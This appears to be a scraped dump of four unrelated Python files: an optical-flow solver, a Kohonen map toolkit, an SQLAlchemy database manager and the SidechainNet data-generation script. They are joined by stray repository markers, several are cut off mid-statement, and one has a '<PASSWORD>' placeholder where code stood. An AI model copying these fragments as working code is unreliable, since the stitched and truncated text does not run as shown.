coords1 = numpy.vstack([Y[:-1, :].ravel(**args), X[:-1, :].ravel(**args)])
coords2 = numpy.vstack([Y[1:, :].ravel(**args), X[1:, :].ravel(**args)])
edges1 = np.ravel_multi_index(coords1, I0_.shape, **args)
edges2 = np.ravel_multi_index(coords2, I0_.shape, **args)
D2 = coo_matrix(
(
numpy.hstack([-weights.ravel(**args), weights.ravel(**args)]),
(numpy.hstack([edges1, edges1]), numpy.hstack([edges1, edges2])),
),
shape=(MN, MN)
)
return D1, D2,
#%% Computes Lipschitz constant
def compute_lipschitz_constant(normAtA, alpha, mu_data, mu_tv):
L = 8 * alpha / mu_tv + normAtA / mu_data
return L
#%% Computes the derivative of the TV term
def df_tv(x, x0, mu, Dt, D1, D2):
#%% see Eq. 17 at Ayvaci, Raptis, Soatto, NIPS'10
x = x + x0
D1x = D1.dot(x)
D2x = D2.dot(x)
tvx = (D1x * D1x + D2x * D2x) ** .5
#print "tvx", tvx.T
#print "mu", mu
w = numpy.maximum(tvx, mu)
#print "w", w.T
u1 = D1x / w
u2 = D2x / w
df = Dt.dot(numpy.vstack([u1, u2]))
f = tvx.sum()
return df, f
#%% Computes the derivative of the Huber-L1 norm on x
def huber_l1(x, mu):
inds = x <= mu
#print ~inds
fx = numpy.zeros(x.shape)
fx[inds] = x[inds] ** 2 / (2 * mu)
fx[~inds] = numpy.abs(x[~inds]) - (mu / 2)
#print "fx", fx
f = numpy.sum(fx)
return f
# Computes the derivative of the Huber-L1 norm on the data term |Ax + b|
def df_huber_l1_Axplusb(x, A, b, mu):
Axplusb = A.dot(x) + b
#print "Axplusb", Axplusb
Axbplus_abs = numpy.abs(Axplusb)
#print "Axbplus_abs", Axbplus_abs
#print mu
max_ = numpy.maximum(Axbplus_abs, mu)
#print max_
#print "Axplusb / max_", Axplusb / max_,
df = A.T.dot(Axplusb / max_)
f = huber_l1(Axplusb, mu)
return df, f
# Computes the derivative
def compute_df(x, A, b, u0, v0, alpha, mu_data, mu_tv, Dt, D1, D2):
MN = x.shape[0] / 2
MN2 = 2 * MN
df1, f1 = df_huber_l1_Axplusb(x, A, b, mu_data)
#print "df1", df1
df2, f2 = df_tv(x[0: MN], u0, mu_tv, Dt, D1, D2)
#print "df2", df2, df2.shape, f2.shape
df3, f3 = df_tv(x[MN:MN2], v0, mu_tv, Dt, D1, D2)
#print "df3", df3
df = df1 + alpha * numpy.vstack([df2, df3])
f = f1 + alpha * (f2 + f3)
#print "df2", df2.T
return df, f
def visualize(k, x, stats, A, b, u0, v0, M, N):
#print x.shape, u0.shape, v0.shape
MN = M * N
u = (x[0:MN] + u0 ).reshape([N, M]).T
v = (x[MN:] + v0 ).reshape([N, M]).T
plt.figure(100)
#plt.quiver( u, v, scale_units='xy', scale=0.1, angles='xy')
plt.quiver(u, v, scale_units='xy', angles='xy')
plt.xlim(-1, M + 1)
plt.ylim(-1, N + 1)
# pyramid generation and flow estimation
def Huber_L1_wTV_nesterov_core(A, b, u0_, v0_, D1, D2, M, N, params):
MN = M * N
MN2 = MN * 2
At = A.T
Atb = At.dot(b)
AtA = At.dot(A)
AAt = A.dot(At)
normAtA = max(AAt.diagonal())
D1 = D1
D2 = D2
Dt = scipy.sparse.vstack([D1, D2]).T
# %% Parameters
alpha = params.alpha
mu_data = params.mu_data
mu_tv = params.mu_tv
# %% Initialize
x0 = numpy.zeros([MN2, 1])
xk = x0
xold = xk
L = compute_lipschitz_constant(normAtA, alpha, mu_data, mu_tv)
# initialize statistics storage
stats = MyStruct()
stats.f = numpy.zeros([1, params.maxiters])
stats.energy = numpy.zeros([params.maxiters])
stats.conver = numpy.zeros([params.maxiters])
k = 0
iteration = 1
stop = False
wdf = 0
while not stop and iteration < params.maxiters:
#if 0:
# print "iter", iter
# step (1) compute the derivative
df, f = compute_df(xk, A, b, u0_, v0_, alpha, mu_data, mu_tv, Dt, D1, D2)
# step (2) update yk
yk = xk - (1 / L) * df
# step (3) update zk
alphak = (k + 1) / 2.
wdf += alphak * df
zk = x0 - (1 / L) * wdf
# step (4) blend yk and zk
tauk = 2. / (k + 3)
xkp = tauk * zk + (1 - tauk) * yk
xk = xkp
# save statistics
stats.energy[iteration] = f
if iteration > 10:
iterm10 = iteration - 10
fbar = numpy.mean(stats.energy[iterm10:iteration])
convergence = abs(f - fbar) / fbar
#print "convergence", convergence
if convergence < 1e-4:
stop = True
# visualize
if params.display and (((k + 1) % 100) == 1 or stop or ((iteration + 1) == params.maxiters)):
#if 1:
visualize(k, xk, stats, A, b, u0_, v0_, M, N)
xold = xk
k += 1
iteration += 1
xk = xk + numpy.vstack([u0_, v0_])
return xk
# In[116]:
#np.set_printoptions(precision=5, linewidth = 250)
##At.todense()
##print L, normAtA, alpha, params.alpha, df
#df, f = compute_df(xk, A, b, u0_, v0_, alpha, mu_data, mu_tv, Dt, D1, D2);
def Huber_L1_wTV_nesterov(I0, I1warped, u0, v0, Ix, Iy, It, params):
M, N = I0.shape
b = It.T.reshape([-1, 1])
A = scipy.sparse.hstack([
scipy.sparse.diags([Ix.T.ravel()], [0]),
scipy.sparse.diags([Iy.T.ravel()], [0]),
])
D1, D2 = makeweights(I0, params)
x = Huber_L1_wTV_nesterov_core(A, b, u0.reshape(-1, 1, order='F'), v0.reshape(-1, 1, order='F'), D1, D2, M, N,
params)
x = x.reshape([2, M * N]).T
u = x[:, 0].reshape([N, M]).T
v = x[:, 1].reshape([N, M]).T
return u, v
import sys
def construct_image_pyramid(I, pyrlevels, pyrfactor):
#print >> sys.stderr, "Pyramid is constructed to [0,pyrlevels-1] range!!"
factor = 2. ** .5
smooth_sigma = (1. / pyrfactor) ** .5 / factor
pyr = []
tmp = I
pyr.append(I)
for m in range(pyrlevels - 1):
filt1 = scipy.ndimage.filters.gaussian_filter(tmp, smooth_sigma, order=0, output=None, mode='reflect', cval=0.0,
truncate=2.0)
#filt1r = scipy.ndimage.zoom(filt1, pyrfactor, order=1)
filt1r = my_resize(filt1, pyrfactor)
tmp = filt1r
pyr.append(filt1r)
return pyr
def Huber_L1_wTV_nesterov_pyramid(I0, I1):
params = MyStruct()
pyrfactor = .5
warps = 5
pyrlevels = 2
# ALPHA is the coefficient of the regularizer. When the option do_varying_alpha is selected,
# for each pyramid level, its value varies between the values alpha0 and alphamax with the
# multiplier alphamult at each warping step.
params.do_varying_alpha = True
if params.do_varying_alpha:
params.alpha0 = 0.006
params.alphamult = 5
params.alphamax = 0.8
else:
params.alpha = 0.2
# Thresholds for Huber-L1 norm for data term and regularizer
params.mu_tv = 0.01
params.mu_data = 0.01
# Parameters of weights for gradients: w(x) = NU - (1-NU) exp(-BETA |\nabla I(x)|^2_2)
params.beta = 30
params.nu = 0.01
params.maxiters = 500 # max number of iterations for each optimization loop
params.display = True # display results
iscolor = False
I0pyr = construct_image_pyramid(I0, pyrlevels, pyrfactor)
I1pyr = construct_image_pyramid(I1, pyrlevels, pyrfactor)
import scipy.ndimage
#level = pyrlevels - 1
for level in range(pyrlevels - 1, -1, -1):
M, N = | |
<gh_stars>0
def triedctk():
"""
Les méthodes ctk : Cartes Topologiques de Kohonen
findbmus : Détermine les référents les plus proches (Best Match Units)
mbmus : Trouve les multiples bmus dans l'ordre des plus proches
errtopo : Erreur topologique (cas d'une carte rectangulaire uniquement)
findhits : Calcul les nombres d’éléments captés par les référents
showmap : Affiche les variables de la carte
showmapping : Montre le déploiement de la carte dans l’espace des données (2 à 2)
showcarte : Affichage de la carte selon différents paramètres
showbarcell : Affiche les référents de la cartes en forme de bar
showprofils : Montre les référents et/ou leurs données sous forme de courbe
showrefactiv: Fait apparaitre l’activation des neurones (distance inverse)
en fonction des formes présentées
showrefpat : Montre les formes (intégrées) captés par les neurones
cblabelmaj : Labellisation des référents par vote majoritaire
reflabfreq : Tableau de frequences des labels par referent
cblabvmaj : Label des référents attribué par vote majoritaire
cblabfreq : Label Frequence des 'Labels' des référents
label2ind : Transforme des labels de type string en indice (de type entier)
mapclassif : Classifie de données par la carte.
classifperf : Performance en classification
"""
return None
import sys
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
from triedpy import triedtools as tls
#def ctk_bmus (sm, Data=None) :
def findbmus (sm, Data=None) :
''' BMUS = findbmus (sm, Data) :
| Passer la structure de la carte (sm) d'ou on tirera les référents
| (sm.codebook) et accessoirement les données pour récupérer en sortie
| les BMUS (Il devrait bien y avoir une fonction équivalente dans Sompy,
| mais pour le moment, je ne l'ai pas identifiée)
| Si Data n'est pas renseignée on prend les données de la structure sm
| qui sont sensées correspondre aux données d'apprentissage de la carte.
| Il est suggéré d'appeler une fois cette fonction pour garder les bmus
| qui sont susceptibles d'être utilisés plusieurs fois par la suite.
| Incidemment, on remarque que l'on peut obtenir des bmus pour d'autres
| données (comme celles de test par exemple)
'''
# Cette fonction peut etre remplacer par mbmus ; on la garde
# cependant pour assurer une compatibilité vers le bas.
if Data==[] or Data is None: # par defaut on prend celles de sm supposées etre celles d'App.
Data = sm.data
nbdata = np.size(Data,0);
BMUS = np.ones(nbdata).astype(int)*-1;
distance = np.zeros(sm.nnodes);
for i in np.arange(nbdata) :
for j in np.arange(sm.nnodes) :
C = Data[i,:] - sm.codebook[j,:];
distance[j] = np.dot(C,C);
Imindist = np.argmin(distance);
BMUS[i] = Imindist;
return BMUS
def mbmus (sm, Data=None, narg=1) :
# multiple bmus (cette fonction peut remplacer findbmus)
# sm : La structure de la carte topologique
# Data : Les données pour lesquelles ont veut avoir lss bmus
# Par défaut on prend celles associées à la carte qui sont
# censé etre des données d'apprentissage
# narg : Nombre de bmus dans l'ordre des plus proches
if Data==[] or Data is None: # par defaut on prend celle de sm supposé etre celles d'App.
Data = sm.data
nbdata = np.size(Data,0);
MBMUS = np.ones((nbdata,narg)).astype(int)*-1;
distance = np.zeros(sm.nnodes);
for i in np.arange(nbdata) :
for j in np.arange(sm.nnodes) :
C = Data[i,:] - sm.codebook[j,:];
distance[j] = np.dot(C,C);
#Imindist = np.argmin(distance);
Imindist = np.argsort(distance);
MBMUS[i] = Imindist[0:narg];
return MBMUS
def errtopo(sm,bmus2) : # dans le cas 'RECT' uniquement
#te : Topographic error, the proportion of all data vectors
# for which first AND second BMUs are not adjacent units.
# 0 1 2 3 4
# |
# 5 6--- 7 ---8 9
# |
# 10 11 12 13 14
#
# par ex les voisins de 7 : 7-5, 7-1, 7+1, 7+5 (5 etant le nbr de col)
# c'est donc : (7, 7, 7, 7) + (-5, -1, +1, +5) = (2, 6, 8, 12)
# supposons que le 2ème bmus après 7 soit :
# 13 -> +1 non adjacent
# 8 -> +0 non adjacent
# bmus2 doit etre un tableau Nx2
ncol = sm.mapsize[0];
voisin = np.array([-ncol, -1, +1, +ncol])
unarray = np.array([1, 1, 1, 1])
not_adjacent = 0.0;
for i in np.arange(sm.dlen) :
vecti = unarray * bmus2[i,0];
ivois = vecti + voisin
if bmus2[i,1] not in ivois :
not_adjacent = not_adjacent + 1.0;
et = not_adjacent / sm.dlen
return et
#def ctk_hits (sm, bmus=[]) :
def findhits (sm, bmus=None) :
''' HITS = findhits(sm, bmus=None)
| Calcul les nombres d’éléments captés par les référents. Ce nombre est
| appelé hit mais aussi magnitude. Si les bmus ne sont pas passés, on les
| détermine en considérant les données d'apprentissage.
'''
HITS = np.zeros(sm.nnodes).astype(int);
if bmus==[] or bmus is None :
bmus = np.array(findbmus(sm));
for inode in np.arange(sm.nnodes) :
idx = np.where(bmus==inode);
HITS[inode] = np.size(idx);
return HITS;
#def gatheril (indices, labels, sep='\n') :
def gatheril (indices, labels) :
sep=' '
if len(indices) != len(labels) :
print("indices and Labels must have the same number of items")
sys.exit(0);
labs = np.copy(labels).astype(str)
Flag = (np.ones(max(indices+1))*-1).astype(int);
Uind = (np.ones(len(tls.unique(indices)))*-1).astype(int);
#Ulab = np.empty(len(tls.unique(indices))).astype(str)
Ulab = np.empty(len(tls.unique(indices)),dtype='<U64')
Csep = (np.empty(max(indices+1))).astype(str);
k = 0;
for i in np.arange(len(indices)) :
if Flag[indices[i]] == -1 :
Flag[indices[i]] = k;
Uind[k] = indices[i];
Ulab[k] = labs[i];
Csep[k] = ' ';
k = k + 1;
else :
fii = Flag[indices[i]][0];
#Ulab[fii] = Ulab[fii] + '\n' + labs[i]
#Ulab[fii] = Ulab[fii] + sep + labs[i]
Ulab[fii] = Ulab[fii] + Csep[fii] + labs[i]
#if sep==' ' : sep='\n'; else : sep=' ';
if Csep[fii]==' ' :
Csep[fii]='\n';
else :
Csep[fii]=' ';
return Uind, Ulab
def showmap(sm, sztext=11, coltext='k',colbar=True, cmap=cm.jet, interp=None,caxmin=None,
caxmax=None,axis=None, comp=[], nodes=None, Labels=None, dh=0, dv=0) :
''' showmap(sm, sztext, colbar, cmap, interp, caxmin,caxmax)
| Visualisations des variables (componants) de la carte. Il s'agit d'un
| équivalent moins sophistiqué de som_show (sans la U-Matrix)
| Les paramètres :
| sm : La structure de la carte (C'est le seul paramètre obligatoire)
| sztext : la taille du text : 11 par défaut
| colbar : Affichage de la colorbar : True par défaut
| cmap : Map de couleur : jet par défaut
| interp : Valeur du paramètre d'interpolation pour la fonction imshow de
| Matplotlib. Par défaut, ou en présence de None, un lissage des
| couleurs est effectué (comme le shading interp de matlab).
| Passer la valeur 'none' pour ne pas faire de lissage.
| caxmin, et caxmax : permet de définir des bornes min et max communes
| pour les échelles de couleur de toutes les variables.
| axis : Permet d'agir sur les axes ('off', equal','tight',...)
| comp : Liste d'ndice(s) des composantes (variables) à afficher; par
| défaut, elles le seront toutes.
'''
nbl, nbc = sm.mapsize;
if comp is None or comp==[] :
nvar = sm.dim;
comp = np.arange(nvar);
else :
nvar = len(comp)
comp = np.asarray(comp)
comp = comp - 1;
fig = plt.figure();
nbsubc = np.ceil(np.sqrt(nvar));
nbsubl = np.ceil(nvar/nbsubc);
isub=0;
if nodes is not None or Labels is not None :
if len(nodes) != len(Labels) :
print("triedctk.showmap: nodes and Labels must have the same number of items")
sys.exit(0);
Unodes, Ulabels = gatheril(nodes, Labels)
for i in comp :
isub+=1;
plt.subplot(nbsubl,nbsubc,isub);
Ref2D = sm.codebook[:,i].reshape(nbl,nbc);
if caxmin==None :
vmin = np.min(Ref2D);
else :
vmin = caxmin;
if caxmax==None :
vmax = np.max(Ref2D);
else :
vmax = caxmax;
#if interp=='on' :
# plt.imshow(Ref2D,cmap=cmap, vmin=vmin, vmax=vmax);
#else :
# plt.imshow(Ref2D,interpolation='none',cmap=cmap, vmin=vmin, vmax=vmax);
plt.imshow(Ref2D,interpolation=interp, cmap=cmap, vmin=vmin, vmax=vmax);
if sm.varname==[] :
plt.title("Variable %d" %(isub), fontsize=sztext);
else :
plt.title("%s" %(sm.varname[i]), fontsize=sztext);
if colbar==True :
plt.colorbar();
#if 1==0 : # This is to confirm, regardless codebook,
# inode = 0 # how neurones cells are ordered
# for i in np.arange(nbl) :
# for j in np.arange(nbc) :
# inode = +=1;
# plt.text(j,i,"%d" %(inode),fontsize=12),
if 0 : #nodes | |
<reponame>libcommon/sqlalchemy-dbutils-py
## -*- coding: UTF8 -*-
## manager.py
## Copyright (c) 2020 libcommon
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
from getpass import getpass
import os
from pathlib import Path
from typing import Any, Optional, Union
from sqlalchemy import create_engine as sqla_create_engine, MetaData
from sqlalchemy.engine import Engine
from sqlalchemy.engine.url import make_url, URL
from sqlalchemy.orm import scoped_session as ScopedSession, Session, sessionmaker as SessionMaker
from sqlalchemy.orm.query import Query
__author__ = "libcommon"
DBManagerSessionFactory = Union[ScopedSession, SessionMaker]
DBManagerSession = Union[ScopedSession, Session]
ConnectionURL = Union[str, URL]
class DBManager:
"""SQLAlchemy ORM database connection manager with
utility methods for connecting to, querying, performing/rolling back
transactions on, and deleting records from the database. Agnostic to
database backend and designed for use within a single process (not shared
by multiple processes.)
"""
__slots__ = ("_engine", "_scoped_sessions", "_session", "_session_factory", "connection_url", "metadata",)
@classmethod
def from_file(cls, config_path_str: str) -> "DBManager":
"""
Args:
config_path => path to file containing connection URL
Description:
Reads connection URL from config file and creates instance of class.
Will validate connection URL and if it doesn't have password, will prompt user.
Preconditions:
Connection URL must be a valid RFC1738 URL and must be the only content in the file.
Raises:
FileNotFoundError: if provided config_path isn't an existing file
ValueError: if validation (parsing) of connection URL fails
"""
# Ensure config_path is existing file
config_path = Path(config_path_str)
if not config_path.is_file():
raise FileNotFoundError(str(config_path))
# Read first line from file and use as connection URL
with open(str(config_path)) as config_file:
connection_url_str = config_file.read().strip()
# Parse connection URL into various components
try:
connection_url = make_url(connection_url_str)
except Exception as exc:
raise ValueError("Failed to parse URL from file ({})".format(exc))
# If is not SQLite file and password not provided, get password from user
if not ("sqlite" in connection_url.drivername or connection_url.password):
passwd = getpass("Enter database password: ")
connection_url.password = <PASSWORD>
return cls(connection_url)
def __init__(self,
connection_url: ConnectionURL,
metadata: Optional[MetaData] = None,
scoped_sessions: bool = False):
if isinstance(connection_url, str):
connection_url = make_url(connection_url)
self.connection_url = connection_url
self.metadata = metadata
self._scoped_sessions = scoped_sessions
self._engine: Optional[Engine] = None
self._session: Optional[Session] = None
self._session_factory: Optional[DBManagerSessionFactory] = None
def create_engine(self, **kwargs) -> "DBManager":
"""
Args:
kwargs => passed to SQLAlchemy Engine constructor
Description:
Create SQLAlchemy Engine using self.connection_url.
See: https://docs.sqlalchemy.org/en/13/core/engines.html
Preconditions:
N/A
Raises:
RuntimeError: if self.engine is already set and persist is True
"""
# Ensure self._engine isn't already defined
# NOTE: Consider whether this implementation makes sense, or if it makes more sense
# to simply dispose of existing engine (with DEBUG log) before creating new one.
if self._engine:
raise RuntimeError("Cannot attach new Engine without removing existing one")
# Create SQLAlchemy Engine with connection URL
engine = sqla_create_engine(self.connection_url, **kwargs)
self._engine = engine
return self
def close_engine(self) -> "DBManager":
"""
Args:
N/A
Description:
Close and dispose of existing Engine and connection pool on
self._engine if defined.
Preconditions:
N/A
Raises:
N/A
"""
# If have active session, close it before engine
if self.session():
self.close_session()
# If self._engine defined
if self._engine:
# Dispose of existing connection pool
self._engine.dispose()
self._engine = None
return self
def with_metadata(self, metadata: MetaData) -> "DBManager":
"""
Args:
N/A
Description:
Setter for self.metadata using builder pattern.
Preconditions:
N/A
Raises:
N/A
"""
self.metadata = metadata
return self
def bootstrap_db(self) -> "DBManager":
"""
Args:
N/A
Description:
Create all tables defined in self.metadata.
See: https://docs.sqlalchemy.org/en/13/core/metadata.html
Preconditions:
N/A
Raises:
N/A
"""
if not self._engine:
raise RuntimeError("Cannot bootstrap database without an Engine")
if not self.metadata:
raise RuntimeError("Cannot bootstrap database with MetaData")
self.metadata.create_all(self._engine)
return self
def create_session_factory(self, **kwargs) -> "DBManager":
"""
Args:
kwargs => passed to SQLAlchemy sessionmaker constructor
Description:
Create SQLAlchemy scoped_session if self._scoped_sessions is True,
otherwise sessionmaker. All kwargs are passed to sessionmaker constructor.
This method should only be called _once_ by the DBManager. SQLAlchemy doesn't
recommend manually closing all sessions, and the mechanics for doing so have changed
across versions.
See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#session-and-sessionmaker
and https://docs.sqlalchemy.org/en/13/orm/contextual.html#sqlalchemy.orm.scoping.scoped_session
and https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.sessionmaker.close_all
Preconditions:
N/A
Raises:
RuntimeError: if self._session_factory is already defined, or
if self._engine isn't defined
"""
# Ensure self._session_factory isn't already defined
if self._session_factory:
raise RuntimeError("Session factory already created")
# Ensure self._engine is defined
if not self._engine:
raise RuntimeError("Cannot create session factory without an Engine")
# Generate sessionmaker session factory
self._session_factory = SessionMaker(bind=self._engine, **kwargs)
# If scoped sessions, wrap in scoped_sessions factory
if self._scoped_sessions:
self._session_factory = ScopedSession(self._session_factory)
return self
def connect(self, bootstrap: bool = False) -> "DBManager":
"""
Args:
N/A
Description:
Create database engine and session factory (but _not_ active session).
gen_session must be called subsequently to create an active session.
If bootstrap specified, use self.metdata and self._engine to create all tables,
indexes, views, etc.
Preconditions:
N/A
Raises:
ValueError: if bootstrap and self.metadata isn't defined
"""
# Generate database engine if needed
if not self._engine:
self.create_engine()
# Bootstrap database if asked
if bootstrap:
self.bootstrap_db()
# Generate session factory if needed
if not self._session_factory:
self.create_session_factory()
return self
def gen_session(self, persist: bool = True) -> DBManagerSession:
"""
Args:
persist => whether to persist created session on self
Description:
Generate new database session. If persist is True, assign new session
to self._session. In this way, the DBManager can act simply as a factory for new sessions,
or as a more complete DB manager. Use the `session` method to access the active session.
See: https://docs.sqlalchemy.org/en/13/orm/session_basics.html#basics-of-using-a-session
Preconditions:
N/A
Raises:
RuntimeError: if self._session_factory hasn't been created yet, or
if self._session is already set and persist is True (for non-scoped sessions)
"""
# Ensure session factory has been created
if not self._session_factory:
raise RuntimeError("Session factory must be created before a session can be generated")
# If scoped sessions, return scoped session manager
if self._scoped_sessions:
return self._session_factory # type: ignore
# Otherwise, generate new session from session factory
session = self._session_factory()
# If persist session to self, ensure self.session isn't already defined
if persist:
if self._session:
raise RuntimeError("Cannot attach new Session without removing existing Session")
self._session = session
return session
def session(self) -> Optional[DBManagerSession]:
"""
Args:
N/A
Description:
Current session (if exists).
Preconditions:
N/A
Raises:
N/A
"""
# If scoped sessions, return scoped session manager
if self._scoped_sessions:
return self._session_factory # type: ignore
# Otherwise, return self._session
return self._session
def close_session(self) -> "DBManager":
"""
Args:
N/A
Description:
Close the current session.
Preconditions:
N/A
Raises:
N/A
"""
# If scoped sessions and session factory has been initialized,
# remove current session
if self._scoped_sessions and self._session_factory:
self._session_factory.remove() # type: ignore
# If session on self, close it
elif self._session:
self._session.close()
self._session = None
return self
def _assert_session(self) -> DBManagerSession:
"""
Args:
N/A
Description:
Raise ValueError if no existing session. If scoped_sessions
is True, then requires self._session_factory to be defined.
Otherwise, requires self._session to be defined (non-None).
Preconditions:
N/A
Raises:
ValueError: if self._session not defined
"""
session = self.session()
if not session:
raise RuntimeError("Must have active session")
return session
def query(self, model: Any, **kwargs) -> Query:
"""
Args:
model => model of table to query
kwargs => passed to query.filter method
Description:
Wrapper for Session.query, with option to build WHERE clause.
See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.query
Preconditions:
record is instance of class whose parent class was created using SQLAlchemy's declarative_base.
Raises:
RuntimeError: if self._session isn't defined
"""
| |
<gh_stars>100-1000
"""Generates SidechainNet files.
SidechainNet is an all-atom protein structure prediction dataset for machine learning.
SidechainNet extends ProteinNet, including angles and coordinates that describe both
the backbone and sidechain components of each protein structure.
The procedure is as follows:
0. Download ProteinNet raw/text files before calling this script.
1. Parse raw/text ProteinNet files into Python dictionaries.
2. Take ProteinNet IDs (pnids) and download the corresponding all-atom information.
3. Unify the data provided by ProteinNet with the all-atom data by aligning the
protein sequences from ProteinNet with those observed during downloading.
To generate all ProteinNet datasets for a CASP competition, run:
python create.py $PATH_TO_PROTEINNET_FILES_FOR_SINGLE_CASP --thinning all
To generate a single "thinning" (e.g. 30) for a CASP competition, run:
python create.py $PATH_TO_PROTEINNET_FILES_FOR_SINGLE_CASP --thinning 30
Author: <NAME>
Date: 10/28/2020
"""
import argparse
from collections import namedtuple
import os
from multiprocessing import Pool, cpu_count
import pkg_resources
from sidechainnet.utils.sequence import ONE_TO_THREE_LETTER_MAP
import numpy as np
import prody as pr
from tqdm import tqdm
from sidechainnet.utils.align import (assert_mask_gaps_are_correct, expand_data_with_mask,
init_aligner, merge)
from sidechainnet.utils.download import PN_VALID_SPLITS, _reinit_global_valid_splits, download_complete_proteinnet, download_sidechain_data, get_sequence_from_pnid
from sidechainnet.utils.errors import write_errors_to_files
from sidechainnet.utils.manual_adjustment import (manually_adjust_data,
manually_correct_mask,
needs_manual_adjustment)
from sidechainnet.utils.measure import NUM_COORDS_PER_RES
from sidechainnet.utils.organize import get_validation_split_identifiers_from_pnid_list, load_data, organize_data, save_data
from sidechainnet.utils.parse import parse_raw_proteinnet
PNID_CSV_FILE = None
pr.confProDy(verbosity="none")
pr.confProDy(auto_secondary=False)
ArgsTuple = namedtuple(
"ArgsTuple", "casp_version thinning proteinnet_in proteinnet_out "
"sidechainnet_out regenerate_scdata limit")
def combine(pn_entry, sc_entry, aligner, pnid):
"""Supplements one entry in ProteinNet with sidechain information.
Args:
aligner: A sequence aligner with desired settings. See
utils.alignment.init_aligner().
pn_entry: A dictionary describing a single ProteinNet protein. Contains
sequence, coordinates, PSSMs, secondary structure.
sc_entry: A dictionary describing the sidechain information for the same
protein. Contains sequence, coordinates, and angles.
Returns:
A dictionary that has unified the two sets of information.
"""
sc_entry = manually_adjust_data(pnid, sc_entry)
if needs_manual_adjustment(pnid):
return {}, "needs manual adjustment"
# If there is no corresponding ProteinNet entry, we create a template entry
if pn_entry is None:
seq = get_sequence_from_pnid(pnid)
pn_entry = {
"primary": seq,
"evolutionary": np.zeros((len(seq), 21)),
"mask": "?" * len(seq)
}
alignment = True
crd = sc_entry['crd']
ang = sc_entry['ang']
dssp = sc_entry['sec']
ignore_pnmask = True
else:
ignore_pnmask = False
mask, alignment, ang, crd, dssp, unmod_seq, is_mod, warning = merge(
aligner, pn_entry, sc_entry, pnid, ignore_pnmask=ignore_pnmask)
new_entry = {}
if alignment:
# Create new SidechainNet entry containing all information
new_entry["seq"] = pn_entry["primary"]
new_entry["evo"] = pn_entry["evolutionary"]
correct_gaps, bad_gap_len = assert_mask_gaps_are_correct(mask, crd)
if not correct_gaps:
return {}, "bad gaps"
# We may need to add padding where specified by the mask
mask = manually_correct_mask(pnid, pn_entry, mask)
new_entry["ang"] = expand_data_with_mask(ang, mask)
new_entry["crd"] = expand_data_with_mask(crd, mask)
new_entry["sec"] = expand_data_with_mask(dssp, mask)
new_entry["ums"] = make_unmodified_seq_entry(new_entry["seq"], unmod_seq, mask)
new_entry["mod"] = expand_data_with_mask(is_mod, mask)
new_entry["msk"] = mask
new_entry["res"] = sc_entry["res"]
length = len(pn_entry["primary"])
for k, v in new_entry.items():
if k == "crd":
if len(v) // NUM_COORDS_PER_RES != length:
return {}, "failed"
elif k == "ums":
if len(v.split(" ")) != length:
return {}, "failed"
elif k != "res":
if len(v) != length:
return {}, "failed"
return new_entry, warning
def combine_wrapper(pndata_scdata_pnid):
"""Wraps a call to combine for use with multiprocessing.pool."""
pn_data, sc_data, pnid = pndata_scdata_pnid
aligner = init_aligner()
return combine(pn_data, sc_data, aligner, pnid)
def make_unmodified_seq_entry(pn_seq, unmod_seq, mask):
"""Given observed residues, create the unmodified sequence entry for SidechainNet."""
padded_unmod_seq = expand_data_with_mask(unmod_seq, mask)
unmod_seq_complete = []
for c_pn, c_unmod in zip(pn_seq, padded_unmod_seq):
if c_unmod == "---":
unmod_seq_complete.append(ONE_TO_THREE_LETTER_MAP[c_pn])
else:
unmod_seq_complete.append(c_unmod)
return " ".join(unmod_seq_complete)
def combine_datasets(proteinnet_out, sc_data, thinning=100):
"""Adds sidechain information to ProteinNet to create SidechainNet.
Args:
proteinnet_out: Location of preprocessed ProteinNet data
sc_data: Sidechain data dictionary with keys being ProteinNet IDs
thinning: Which training set thinning to use (i.e. 30, 50,... 100)
Returns:
SidechainNet as a dictionary mapping ProteinNet IDs to all data relevant
for sidechain prediction.
"""
print("Preparing to merge ProteinNet data with downloaded sidechain data.")
pn_files = [
os.path.join(proteinnet_out, f"training_{thinning}.pkl"),
os.path.join(proteinnet_out, "validation.pkl"),
os.path.join(proteinnet_out, "testing.pkl")
]
pn_data = {}
for f in pn_files:
d = load_data(f)
pn_data.update(d)
del d
with Pool(cpu_count()) as p:
tuples = (get_tuple(pn_data, sc_data, pnid) for pnid in sc_data.keys())
results_warnings = list(
tqdm(p.imap(combine_wrapper, tuples),
total=len(sc_data.keys()),
dynamic_ncols=True))
combined_data, errors = write_errors_to_files(results_warnings, sc_data.keys())
print(f"Finished unifying sidechain information with ProteinNet data.\n"
f"{len(errors['failed'])} IDs failed to combine successfully.")
return combined_data
def get_tuple(pndata, scdata, pnid):
"""Extract relevant SidechainNet and ProteinNet data from their respective dicts."""
try:
return pndata[pnid], scdata[pnid], pnid
except KeyError:
return None, scdata[pnid], pnid
def format_sidechainnet_path(casp_version, training_split):
"""Returns a string representing a .pkl file for a CASP version and training set."""
if casp_version == "debug":
return "sidechainnet_debug.pkl"
return f"sidechainnet_casp{casp_version}_{training_split}.pkl"
def create(casp_version=12,
thinning=30,
sidechainnet_out="./sidechainnet_data",
regenerate_scdata=False,
limit=None):
"""Generate the requested SidechainNet dataset and save pickled result files.
This function replicates CLI behavior of calling `python sidechainnet/create.py`.
Args:
casp_version (int, optional): CASP dataset version (7-12). Defaults to 12.
thinning (int, optional): Training set thinning (30, 50, 70, 90, 95, 100
where 100 means 100% of the training set is kept). If 'all', generate all
